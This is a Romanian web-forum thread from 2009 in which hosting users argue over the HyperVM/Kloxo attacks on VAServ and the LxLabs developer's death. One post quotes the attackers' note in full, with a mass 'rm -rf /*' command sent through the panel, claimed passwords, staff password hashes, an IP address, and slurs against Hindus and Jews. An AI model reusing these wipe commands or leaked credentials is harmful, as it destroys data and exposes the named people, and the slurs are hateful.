HyperVM panel were last days attacked by hackers using bug in HyperVM panel

Dear Clients,

As you may know several big companies using HyperVM panel were last days attacked by hackers using bug in HyperVM panel.
More than 100 000 webpages stopped working.Also we have been informed that the owner of LxLabs (company which produces HyperVM/Kloxo)  committed suicide.We are still unsure if LxLabs will continue their work with Kloxo (former LxAdmin) and HyperVM therefore to protect your data
against hacking attempts we decided to shut down HyperVM until the things would be more certain.
We advise you also stop using LxAdmin/Kloxo and rather use Directadmin/Cpanel for your vpses.

Meanwhile we are looking and testing other control panels to provide you with this service asap.

si cam asta a fost finalul la VPS-urile moka.
Alea oferite cu openvz si hyperVM.
Ei, acum cine vrea moka , are de invatat administrare via linie de comanda
Unless...Virtuozzo, care costa putin dar cel putin nu te trezesti cu serverul hackat.
Am vazut zilele trecute cateva mii de vps-uri sterse.

Si eu am hosting la aceeasi firma iar urmatorul mesaj, cel de astazi, a fost asta:

Quote

Pacat ca s-a sinucis un om talentat, un programator care a ajutat mult industria de hosting !

Edited by Jaguar Paw, 10 June 2009 - 18:32.

Mai tu esti sarit?

Talentul ala si ajutorul s-au concretizat prin cateva mii de vps-uri sterse.Si alte multe mii compromise.
Concret, omul a fost pus in tema cu 3 saptamani inainte de a se face publice, despre gaurile de securitate din minunea lui.Punctual.Direct.
Atat de mult a ajutat industria incat nu s-a obosit nici macar sa citeasca ce i-au trimis omultetii aia si sa-si dreaga produsul.
Iar cand a pocnit treaba s-a dus si s-a spanzurat.

Super inteligent.

Ai o mostra aici ca moka intotdeauna are partea ei urata.


Te-ai luat de mine pe tema asta si facea apologia lui moka.
Conform listei de gauri de securitate sa inteleg ca puteam sa ma servesc cu VPS-ul tau oricand, sa-ti pun pornache sau pur si simplu sa il sterg.
True?

Edited by WBF, 10 June 2009 - 18:49.

El (K. T. Ligesh) a facut munca patriotica, a programat HyperVM si l-a oferit gratuit, asta inseamna un pret mai scazut pt un VPS, pt asta nu merita sa fie scuipat acum de oameni ca tine !

Acum s-au descoperit niste gauri de securitate in soft insa el a fost folosit mult timp fara probleme, oricum el merita amintit ca un o persoana care a incercat si a reusit dezvoltarea industriei de hosting, un programator foarte bun, recunoscut international !

Nu stiu care sunt motivele pt care el nu a reusit sa acopere acele gauri de securitate...
Oricum, e tragic ca o persoana talentata a recurs la acet gest !

Eu nu sunt sarit, dar tu cred ca esti cazut in cap!

Detalii aici:

http://www.theregist...bs_funder_death

http://timesofindia....how/4633101.cms

Edited by Jaguar Paw, 10 June 2009 - 19:37.

Gaurile de securitate existau.
Produsele nu erau open source ci erau SaS , ca sa intelegi, servicii platite.
O companie care-si bazeaza serviciile pe software facut de un one man show  merita sa se trezeasca cu asemenea bucurii.
Cine nu merita in schimb sunt clientii.

Sa faci un produs este simplu.Sa faci mentenanta la el, sa il dregi si sa ai grija de el, cam asta inseamna sa oferi SaS.
Ca si comparatie WHMCS.One man show pana anul trecut.
Gasit gauri de securitate , dres in cateva ore.Suport ireprosabil.Update-uri unul dupa altul.
Cand Matt de la WHMCS s-a trezit cu gauri de securitate raportate le-a dres instant, nu le-a ignorat saptamani la rand iar apoi s-a sinucis.
Cam aia inseamna software.Nu sa il faci ci sa il faci si sa il sustii.

Repet intrebarea:
Cand recomandai ce recomandai ai fi putut banui ca oricine se poate juca cu serverul tau , ala privat si virtual?
Era ieftin pentru ca in loc de 7.95$/VPS licentiere se platea 0,5$/VPS.
Aici era diferenta.

Mda, sunt cazut in cap ca nu deplang pe cineva care in loc sa-si faca treaba pentru care incasa bani ( unde mama dracului ai citit tu de munca patriotica????   http://lxlabs.com/store/ ) a preferat sa-si puna streangul de gat.
Acuma fuga pe WHT sa-ti cauti alternative.
Nu de alta dar este acolo un thread cu toti furnzorii de moka , putin innebuniti ca moka a sucombat

Sa inteleg ca o noapte de baute si durerea in cot fata de un produs facut de un indian te-a facut pe tine sa nu mai ai nici o interfata de administrare si ti-a facut un bine: ala de a alege intre servicii cotate cum trebuie si a invata linie de comanda.
Ca sa vezi unde dai si unde crapa.
BTW, daca aveai servicii de la vaserv, stii ca ai fost vandut?

Edited by WBF, 10 June 2009 - 20:04.

0.5$/VPS e moka ! Nu am hosting de la VAServ !
Ramane ca cei care vor prelua dezvoltarea HyperVM sa rezolve gaurile de securitate si in timp lucrurile vor reveni la normal !

Cei de la hostineuro unde am eu un VPS au oprit HyperVM dar au anuntat ca lucreaza la un nou panou de control si pana la sfarsitul saptamanii viitoare il vor lansa, gratuit pt toata lumea !

HyperVM e oprit dar site-urile functioneaza normal si panoul de control Plesk 9.2.1 pe care eu il folosesc functioneaza normal !
De asemenea celelalte panouri de control DirectAdmin si CPanel functioneaza normal !

Asadar pt cateva zile va trebui sa folosesc Putty pt a restarta VPS-ul !

Edited by Jaguar Paw, 10 June 2009 - 20:42.

Nu preia nimeni un faliment ca acela.
Si nu au de la cine sa preia.

Sa ma anunti cand termina panoul

Ligesh a fost unul dintre cei mai talentati programatori.
Nimeni nu poate face un soft perfect, nici Virtuozzo nu este perfect.
Omul asta "one man show" a facut cateva softuri de server management foarte bune, am folosit doar LxAdmin din creatiile lui, si era foarte util.
Acum, ca s-a sinucis...mi se pare penibil sa te sinucizi din asa ceva, mi se pare penibil sa te sinucizi din orice motiv.

Pacat, vedeam in LxAdmin un concurent bun pe partea allmost free pentru CPanel ...

WBF, ca om de afaceri in domeniul hostingului, ce crezi ca vor face cei de la CPanel si Plesk ...? Au cateva optiuni ... ieftinesc produsele lor pentru a luat cat mai multi clienti ramasi fara c.p. (varianta buna si pentru voi firmele de hosting)...sau profita de disparitia unei alternative si maresc putin preturile (decizie naspa pentru voi si noi)...sau raman la aceleasi preturi (destul de piperate dupa parerea mea).

IspConfig si restul is un trash fata de Lx sau ce versiunile platite...mai mult pierzi bani, timp si nervi cu ele ...

lord_ice, on 11th June 2009, 13:36, said:

Parallels nu vor scadea preturile si nici nu vor face mega oferte.
Targetul soaftelor sinucise zilele trecute aveau ca tinta piata budget.
Piata care este extrem de volatila.
Nu vor scadea pretul si nu vor face nici o miscare deoarece piata budget de VPS-uri NU ARE NICI O ALTA ALTERNATIVA VIABILA.
Vor fi nevoiti sa se increada in alte produse BETA ( vezi panoul de la bobcares, alti indieni, dar care nu-si asuma responsabilitati) sau vor fi nevoiti sa foloseasca produse dezvoltate de companii care stiu sa faca si sa intretina soft de automatizare.

Preturile pentru noi ca si parteneri nu au cum sa le creasca deoarece au un contract de respectat si o grila de preturi negociata ca parte integranta al acelui contract.
Nu vor face reduceri deoarece in cazul unei reduceri toata clientela existenta va cere acele preturi si vor pierde bani.
Ca sa-ti faci o idee, un singur client Parallels, ca exemplu Mediatemple, are mai multe servere virtuale pe platforma Virtuozzo decat tot ce misca in lume cu HyperVM.

Legat de genialitatea unui one man show , repet, sa ne uitam la consecinte:
24 de vulnerabilitati sinistre, care existau de cand lumea in HyperVM/Kloxo. cu consecinta a cateva mii de servere virtuale sterse si alte cateva mii compromise.
Daca ai putina idee despre ce se vorbeste pe millw0rm o sa vezi ca parte din ele nu tin de o versiune anume ci tin de modul in care a fost gandit sa functioneze acel soft.

In principiu, softul pentru VPS(HyperVM/Kloxo/Lxadmin) era folosit cu varianta open source de la Virtuozzo respectiv OpenVZ.
Varianta free, dar care nu ofera decat partial facilitatile Virtuozzo.Una din principalele facilitati Virtuozzo o reprezinta panoul de control al serverului virtual, de unde , chiar si daca acel server era mort, clientul poate sa dea un restart, sa incerce un ssh sau sa faca restore.Chestie care la OpenVZ lipseste si aici venea HyperVM sa suplineasca.

Toate bune si frumoase, si noi folosim OpenVZ pentru servere de uz intern, unde nu avem nevoie sa oferim  interfata vreunui client.Si il folosim cu mult succes, nusunt probleme de securitate sau administrare.

Acum, cand vorbim de clienti care platesc, avem tendinta sa oferim solutii care nu depind de un singur om, la care sa avem suport, si care au un istoric in a mentine acel soft secure si functional.
Daca trecem de aceasta limita si ne gandim doar la pret este adevarat ca am fi putut folosi solutii dezvoltate de "geniali" cu God is a fucking idiot tatuat pe antebrat si care dupa un mail de la millw0rm de avertizare legat de securitate in loc sa dreaga gaurile , le ignora trei saptamani, trag o bauta si-si pun streangul de gat.
Risc pe care o firma cu scaun la cap nu cred ca vrea sa il asume.
Daca il asuma, cum a fost cazul vanzatorilor de ieftin, ajung cu cateva mii de servere sterse complet, si cu nesiguranta ca cele care nu au fost sterse sunt compromise.

Nici unul din cei care foloseau HyperVM/Kloxo/Lxadmin NU ARE CERTITUDINEA ca nu a fost compromis.
Baietii destepti nu sterg, nu modifica , doar lasa portite de intrare for later use.

Un soft care costa 0,5$/VPS nu are cum sa intretina si sa finanteze o echipa de dezvoltatori care sa faca development si mentenanta decat daca exista un volum IMENS de soft vandut.
Ceea ce nu era cazul.

Regret ca cineva s-a sinucis dar nu pot sa scot porumbei pe gura de genul "developer genial", "programator talentat"...etc.
Un developer genial si un programator talentat nu-si bate joc de munca lui, are grija de softul lui , face mentenanta si incearca sa imbunatateasca ceea ce a facut , zilnic si in fiecare minut.
Ignorarea de avertismente valide , o bauta buna si un streang sanatos  nu mi se pare solutia ideala.
Denota labilitate si inconstienta.


Post lung, sper sa intelegi esenta.

Edited by WBF, 11 June 2009 - 14:05.

Da , am inteles esenta.

Dar sa stii ca nu este singurul model in lumea software.
De exemplu, atat de celebrul Wordpress , este creat si intretinut de Doncha O'Connel ... si Wp are bug-uri si exploituri, dar tipul asta se implica incredibil in acest proiect, creaza si core-ul si pluginurile esentiale (din top 5 , 4 is creatiile lui)....iar releasurile mari de core is lunare sau bi-lunare.

Eu am scris ca era unul dintre cei mai talentati programatori , pentru ca indiferent de ce a facut ulterior ... el a reusit acel soft, pe care sunt convins ca altii indivizi "one man show" nu-l vor mai reusi in veci.
Poate greseala omului a fost ca nu a implicat si altii, dar daca nu a avut pe cine? Hai sa ne punem si intrebarea asta...in plus omul trebuie sa traiasca si inafara www-ului, WBF, nu ai putea tine in spate WebFactor, cu support si technic...nici pe departe, asa a fost prins si el, forum support, sfaturi, etc ... eu am un scriptulet mic, facut de unul dintre membrii softpedia si-ti spun ca pe forumul de support is vreo 50-100 de posturi, dar eu tot primesc PM-uri pe Softpedia si intrebari pe mess legate de el in draci, si e un soft mic, cu un scurt tutorial de urmat...dar pentru un virtualizator sau cum se numeste si un panou de hosting... volumul de munca a fost enorm pentru omul acela...hai totusi sa apreciem un pic ce a facut, a reusit acel soft, ca dupa au aparut exploituri pe care nu le-a rezolvat...nu stiu, poate pregatea un future release bug-less ... dar acum ce rost are sa discutam asta...omul e dus, Dumnezeu sa-l odihneasca!

Daca maine toate VPS-urile cu produsul celor de la Plesk cad sa vezi show si procese catre Plesk si catre firmele de hosting   dar asta nu se va intampla pentru ca Plesk incaseaza o groaza de bani pe care ii poate reinvesti in personal si colaborari de development astfel incat alte versiuni sa fie scoase la timp...in plus...cred ca nu e open source ci criptata si re-criptat, nu?

Inteleg de ce o firma de hosting atat de mare ca WebFactor nu va folosi niciodata o solutie free din motivele enumerate de tine si probabil si din alte aspecte legate tot strict de securitate si mai ales de garantii.

Mai.

Nu suntem o firma mare


Ce ai vazut legat de HyperVM/Kloxo/LxAdmin vine din poor business plan si moka.
Moka nu-ti aduce venituri grozave decat daca faci industrie.
Industrie nu se face "one man show"

PS: nu ma mai pune sa scriu posturi lungi si degeaba aici , mai bine citesti blogul

Edited by WBF, 11 June 2009 - 14:43.

Baga si tu un link.

  Cate buguri are chestia aia  

WBF, on 10th June 2009, 19:48, said:

Bravo mai baiete castravete, vorbesti ca la carte, o carte de-aia ciobaneasca romaneasca foarte ingusta.
Inainte de a-ti etala propriile opinii si a incerca sa influentezi audienta acestui forum, accepta sa-ti spun ca sunt un utilizator de Kloxo si inainte cu vreo 4-5 zile sa moara A FIXAT gaurile de pe millw0rm si a facut un update (si ultimul de altfel), chiar daca probabil nu le-a raspuns. Versiunea de kloxo a trecut de la 5.x la 6.x. A facut asta si pentru HyperVM.

So sloooow down cowboy cu papagalu mare, iata si nota care au lasat-o hackerii:

Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are
Code:

e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg
Code:

[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'
[+] Attempting to login using admin / ****off
[+] Logged in, showtime!
		Output for 67.222.156.106
		Output for xen3ws.vaserv.com
		Output for vz22uk.vaserv.com
		Output for xen4ws.vaserv.com
		Output for vzspecial5.vaserv.com
		Output for xen16.vaserv.com
		Output for vz77uk.vaserv.com
		Output for 91.186.26.128
		Output for xen25.vaserv.com
		Output for vz76uk.vaserv.com
		Output for vz18tx.vaserv.com
		Output for vz75uk.vaserv.com
		Output for vz45uk.vaserv.com
		Output for vzpent16.vaserv.com
		Output for xen1tx.vaserv.com
		Output for vz13tx.vaserv.com
		Output for vz74uk.vaserv.com
		Output for vzspecial8.vaserv.com
		Output for xen24.vaserv.com
		Output for vz73uk.vaserv.com
		Output for rdns1.vaserv.com
		Output for vz2tx.vaserv.com
		Output for vz17tx.vaserv.com
		Output for xen23.vaserv.com
		Output for vz72uk.vaserv.com
		Output for xen22.vaserv.com
		Output for vzruffbuff.vaserv.com
		Output for vzmario.vaserv.com
		Output for xen21.vaserv.com
		Output for vz71uk.vaserv.com
		Output for vzspecial7.vaserv.com
		Output for vz70uk.vaserv.com
		Output for xen20.vaserv.com
		Output for vz69uk.vaserv.com
		Output for vzspecial6.vaserv.com
		Output for vz7uk.vaserv.com
		Output for vzspecial4.vaserv.com
		Output for vzspecial3.vaserv.com
		Output for xen19.vaserv.com
		Output for vzspecial2.vaserv.com
		Output for vzspecial1.vaserv.com
		Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#

Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
Code:

1 	1	  rghf 	c32f3310baffcb431875a67196e99ebd	  Rus	  F	  [email protected]		 		  0	  ,	   
	Edit 	Delete 	3 	1 	vlada 	c32f3310baffcb431875a67196e99ebd 	Vlada 	Neskovic 	[email protected] 				0 	, 	 
	Edit 	Delete 	4 	1 	Kody 	fde67637d867c52d739931528dd92ef0 	Kody 	Riker 	[email protected] 		  Georgia - server22 space 1slot 1gb 	0 	,

See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:

Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30

Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.

Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol
Code:

-bash-3.2# ifconfig
lo		Link encap:Local Loopback
		  inet addr:127.0.0.1  Mask:255.0.0.0
		  inet6 addr: ::1/128 Scope:Host
		  UP LOOPBACK RUNNING  MTU:16436  Metric:1
		  RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
		  TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
		  collisions:0 txqueuelen:0
		  RX bytes:1114930 (1.0 MiB)  TX bytes:1114930 (1.0 MiB)

venet0	Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
		  inet addr:127.0.0.1  P-t-P:127.0.0.1  Bcast:0.0.0.0  Mask:255.255.255.255
		  UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
		  RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
		  TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
		  collisions:0 txqueuelen:0
		  RX bytes:4462516 (4.2 MiB)  TX bytes:11170841 (10.6 MiB)

venet0:0  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
		  inet addr:64.79.210.78  P-t-P:64.79.210.78  Bcast:64.79.210.78  Mask:255.255.255.255
		  UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1

venet0:1  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
		  inet addr:64.79.206.197  P-t-P:64.79.206.197  Bcast:64.79.206.197  Mask:255.255.255.255
		  UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1

venet0:2  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
		  inet addr:67.223.225.52  P-t-P:67.223.225.52  Bcast:67.223.225.52  Mask:255.255.255.255
		  UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1

-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#

I love to rm lol bye

~Thedefaced.org

In mod aparent era ceva client nemultumit de-a VAserv care il si cunostea pe boss, pe nume Rus.

Si ca sa-ti mai tai din avant-ul ala de "p .. nu e p... destul daca nu e si fudul" (tot pe grai dulce romanesc) nu fi ghertoi de CJ si citeste blogul lui aici (dar in intregime daca esti in stare ).

http://ligesh.com

Vei vedea ca era un tip care provenea dintr-o familie instarita, super educat si super doxat.
Ca s-a spanzurat si de ce a facut-o asta e alta treaba.
El a pus pe picioare un soft intreg, de unu singur. TU CE AI FACUT ? What is it that you gonna be remembered by, eh ?
In orice caz, dupa ce-i citesti blogul simte-te (spiritual vorbind) ingust si singur in coltul tau stramt ...

Na, acuma nu te enerva ....

Poti sa publici o adresa de IP cu un Lxadmin/HyperVM ruland?

Cine mai foloseste Lxadmin?

LxAdmin + restul de mocangeli inteleg ca au ramas ingropate odata cu dezvoltatorul.

Get over it, rulati un  soft care depindea de un singur om .
Care a ingropat munca lui odata cu el.

Legat de problemele tale de atitudine, inteleg ca te doare ca jucaria ta s-a dovedit nefiabila, dar asta nutrebuie sa duca la refulari.
Multa bafta, nu toti traim sa intram in istorie ca indianul care va lasat cu buza in vant.

Edited by WBF, 17 June 2009 - 11:49.

WBF, on 17th June 2009, 12:45, said:

Da mai baiete, IP-ul meu. Dar nu ti-l dau ca esti baiat rau, rau
Si merge BRICI, idee n-ai cat de bine ....

Hop si un erou.
Deci ai un morcov cat bradul de craciun ca se strica jucaria care merge brici.

Mucles si fuguta la altii cu povesti cu pesti.